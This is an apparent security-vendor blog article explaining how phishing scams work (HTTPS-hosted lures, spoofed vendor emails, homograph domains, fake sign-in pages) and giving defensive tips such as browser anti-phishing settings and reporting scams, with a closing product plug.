While malware attacks and big data breaches often command the media headlines, phishing scams are both more common and in many cases just as serious a threat to companies. Aside from being used to steal credit card details, login credentials, social security numbers and other personal information, phishing scams are also widely used as an entry point for malware and ransomware attacks. Phishing can result not only in identity theft but also in loss of customer data and company intellectual property. When adversaries engage in spear-phishing, targeted attacks on company personnel, or impersonate enterprise platforms like Software as a Service (SaaS), the risk is even greater. In the last 12 months, 69% of organizations that have suffered a ransomware attack said that the attacker gained access to their network by phishing via email or social media.
The most recent report tracking trends in phishing activity published this week showed that phishing campaigns targeting brands have been steadily increasing over the last quarter:
The report notes that phishing scams are increasingly hosted on HTTPS websites, with nearly half of all phishing sites now using the secure protocol. These will not trigger warnings from mechanisms like Chrome’s not secure tab, and their content is invisible to legacy AV solutions, which cannot read encrypted traffic.
HTTPS is attractive to scammers because users are encouraged to think the much-vaunted green lock in the browser address bar indicates a safe or legitimate site. The truth is that any site, no matter how dangerous, can acquire an SSL certificate. They are even offered for free by services like Comodo and Let’s Encrypt. An SSL certificate only establishes a secure connection to the site the user has landed on. It offers no guarantee the site is not malicious.
Phishing for Profit
For any cyberattack, a phishing campaign is a great way to start. Let’s see why it is a favored vector among bad actors.
As the old adage goes, the weakest link in any computer defence strategy is often between the keyboard and the chair; in other words, exploiting human psychology is often easier than exploiting technical systems. Even those that know how to spot a genuine link from a malicious one are not immune to falling victim to a well-crafted phishing campaign.
Using social engineering techniques, persistence and some good initial reconnaissance, phishing is a reasonably reliable way for an attacker to gain an entry point. The scammers have psychology and technology on their side. Add to that some kind of time pressure, such as limited seaonal deals like “Black Friday” or “Cyber Monday” or the unexpected news from a fake legal outfit that your spouse is filing for divorce, and the goal of getting the victim to click a link is statistically odds-on in favor of the attacker.
The trick, particularly in targeted spear-phishing campaigns, is to learn enough about the target to know what will “push her buttons” and to use that information in a carefully-crafted impersonation of a trusted source.
Low Risk, High Return
A second reason why phishing is popular with attackers is that it’s a low risk, high return strategy. While phishing may be used by a threat actor to achieve direct entry into a target, the technique is more commonly used by actors with no intention other than to steal credentials and sell them on the Dark Net, using bitcoin and other cryptocurrencies to easily receive untraceable payments. As many people re-use the same login credentials across multiple sites, phishing can have unexpected rewards for those involved in profiteering by selling sensitive information online, where a single sign-on credential could potentially open up a vast treasure-trove of data and access points.
It is notoriously difficult to verify identities through written communication. If a friend makes a video or telephone call, you can instantly recognize that it is your friend on the other end of the line. If you receive a text-based message from your friend urging you to check out a link or open a document, things are much more difficult. In a busy world, it’s a statistical inevitability that some of us will click on something malicious inadvertently. Scammers know this and, like any kind of advertising, getting “click throughs” is all a question of knowing your audience and putting out enough volume.
It Started With a Link
So how do phishing scams work? Email is the primary, but not only, vector. Text messages and social media sites like Facebook, Twitter and LinkedIn have also been exploited, but the aim is always the same: to get the victim to click on a link, make a phone call, or initiate some other kind of action that will trigger the scam.
Many phishing scams will attempt to impersonate a vendor the victim is familiar with, like this fake Spotify subscription message:
Messages like this push just the right pyschological buttons. The recipient will be both angry about the “mistake” and concerned not to be charged, so there is a strong incentive to click the baited “review your subscription” link.
Links themselves are often manipulated so that they look legitimate to casual observation. Only one of these is real, but how many users would know which one without pausing for thought?
Then there’s homographic attacks in which scammers register sites with unicode characters that are visually similar to the ASCII characters used in the name of a genuine site. Compare these two unicode strings:
and their visual “printed” form, shown on the right in the image below:
These two encodings may look similar to the human eye, but the computer reads them differently. If the first were used in a domain name registration, it would actually point to a completely different site than the second.
Fortunately, most modern browsers can recognise this kind attack, but there were vulnerabilities in Chrome, Firefox and Opera as recently as last year which were able to bypass those browsers’ homographic protection filters.
In a more recent attack, scammers used a real subdomain of Google.com,
sites.google.com, to host webpages that then redirected victims to malicious sites.
Reeling in the Catch
Once the victim has been hooked, the scam could involve any number of ruses, from fraudulent tech support scams to fake email sign-in pages. A common tactic is to tell the victim that they need to update their email account and then provide a reasonably convincing spoof site:
Examination of the code behind the site, however, will show it for what it is: an attempt to steal the user’s login credentials. After the user enters their credentials in the fake site, the code then redirects them to the real site.
Spear-phishing campaigns that target the enterprise may be looking for intellectual property for either industrial or nation-state espionage. A UK engineering company, for example, was recently targeted in a spear-phishing campaign designed to steal secrets about its maritime technology, possibly for a Chinese-backed APT group.
How to Avoid A Scam
Given the dangers, what can a busy person do to reduce the risk of falling for a phishing scam? Here’s some tips:
Ensure that your browsers’ anti-phishing preferences are turned on. It’s not uncommon for users to uncheck this option, and it’s trivial for malware to disable it without user permission.
Depending on your browser, the setting can be found in various places and with various names. For Chrome and Chromium browsers, they are typically under Advanced or Privacy and will be called something like “Safe Browsing” or “Phishing and Malware Protection”.
Firefox calls the setting “Block dangerous and deceptive content”, which is located in its Preferences page under “Privacy & Security”. For Safari, check the “Warn when visiting a fraudulent website” option in its Preferences’ Security tab.
In your email client, disable automatic loading of images and external content stored on remote servers. Failing to do this allows attackers to use clickable images, which can avoid security filters, instead of text for links. It also allows them to include hidden images to notify them when a target opens the poisoned email.
Take a Closer Look
Poor spelling and grammar errors in emails and other messages are always a red flag, so get into the habit of looking closely at the text of emails that contain links. Hover over any links before clicking them to see where they really lead.
It’s also a good idea to develop the habit of never clicking a link from an email. Avoid clicking links or dialing telephone numbers that request personal information, credit card numbers, or account passwords. Instead, go to the page from a bookmark in your browser, or look up the address in an internet search engine. Similarly, always double-check any phone number you’re asked to call either through a web search or looking at your previous correspondence.
Get with the Program
For enterprise users, consider employee training that simulates phishing campaigns on a regular basis. Use a good Next-Gen AV like SentinelOne that can inspect encrypted traffic and enforce firewall control to block known scam sites.
Be a Good Citizen
And of course, if you spot a phishing attack, be sure to report it. You can report phishing, identity theft and other scams online to the Federal Trade Commission (FTC), as well as inform the organization concerned if the scam is spoofing a legitimate site. Reporting functions are provided by Apple, Google, Microsoft and most other major vendors. You can easily find the appropriate page of other vendors with an internet search for “report phishing to” and the vendor name.